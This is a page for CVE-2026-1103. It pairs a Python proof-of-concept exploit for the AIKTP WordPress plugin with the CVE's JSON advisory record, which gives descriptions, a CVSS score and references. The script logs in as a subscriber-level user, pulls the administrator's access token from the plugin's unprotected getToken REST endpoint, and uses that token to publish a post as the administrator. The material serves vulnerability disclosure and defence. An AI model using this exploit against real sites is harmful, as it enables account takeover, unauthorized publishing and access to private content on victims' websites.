CVE-2026-1103

import requests import sys # CVE-2026-1103 PoC - AIKTP Plugin Unauthorized Token Access # This PoC demonstrates how a low-privilege user can obtain admin tokens target = input("Enter target URL (e.g., http://example.com): ").strip() username = input("Enter low-privilege username: ").strip() password = input("Enter password: ").strip() session = requests.Session() # Step 1: Login as low-privilege user (subscriber role) login_url = f"{target}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target}/wp-admin/" } print("[*] Attempting to login as low-privilege user...") login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies) and 'wordpress_logged_in' not in str(login_response.cookies): print("[-] Login failed. Check credentials.") sys.exit(1) print("[+] Login successful!") # Step 2: Request admin token via vulnerable endpoint token_url = f"{target}/wp-json/aiktp/getToken" print(f"[*] Requesting admin token from: {token_url}") token_response = session.get(token_url) if token_response.status_code == 200: try: token_data = token_response.json() admin_token = token_data.get('token') or token_data.get('aiktpz_token') or token_data.get('data', {}).get('token') if admin_token: print(f"[CRITICAL] Admin token obtained: {admin_token}") print("[!] This token can be used to perform admin actions!") # Step 3: Demonstrate token usage (optional) headers = {'Authorization': f'Bearer {admin_token}'} posts_url = f"{target}/wp-json/wp/v2/posts" test_post = session.post(posts_url, headers=headers, json={ 'title': 'Unauthorized Post via CVE-2026-1103', 'content': 'This post was created by exploiting the AIKTP vulnerability.', 'status': 'publish' }) if test_post.status_code in [200, 201]: print(f"[+] Successfully created post! Post ID: {test_post.json().get('id')}") else: print(f"[-] Post creation failed: {test_post.status_code}") else: print("[-] No token found in response") print(f"[-] Response: {token_response.text}") except Exception as e: print(f"[-] Error parsing response: {e}") else: print(f"[-] Token request failed with status: {token_response.status_code}") print(f"[-] Response: {token_response.text}")

{"cve": {"id": "CVE-2026-1103", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:09.347", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AIKTP plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the /aiktp/getToken REST API endpoint in all versions up to, and including, 5.0.04. The endpoint uses the 'verify_user_logged_in' as a permission callback, which only checks if a user is logged in, but fails to verify if the user has administrative capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to retrieve the administrator's 'aiktpz_token' access token, which can then be used to create posts, upload media library files, and access private content as the administrator."}, {"lang": "es", "value": "El plugin AIKTP para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de comprobaciones de autorización en el endpoint de la API REST /aiktp/getToken en todas las versiones hasta la 5.0.04, inclusive. El endpoint utiliza 'verify_user_logged_in' como callback de permisos, que solo comprueba si un usuario ha iniciado sesión, pero no verifica si el usuario tiene capacidades administrativas. Esto hace posible que atacantes autenticados con acceso de nivel Suscriptor y superior recuperen el token de acceso 'aiktpz_token' del administrador, que luego puede ser utilizado para crear publicaciones, subir archivos de la librería de medios y acceder a contenido privado como el administrador."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/aiktp/tags/5.0.04/includes/aiktp-sync.php#L123", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/aiktp/tags/5.0.04/includes/aiktp-sync.php#L143", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3445248%40aiktp&new=3445248%40aiktp", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/84846d95-792d-4569-b0eb-876d82d0beee?source=cve", "source": "[email protected]"}]}}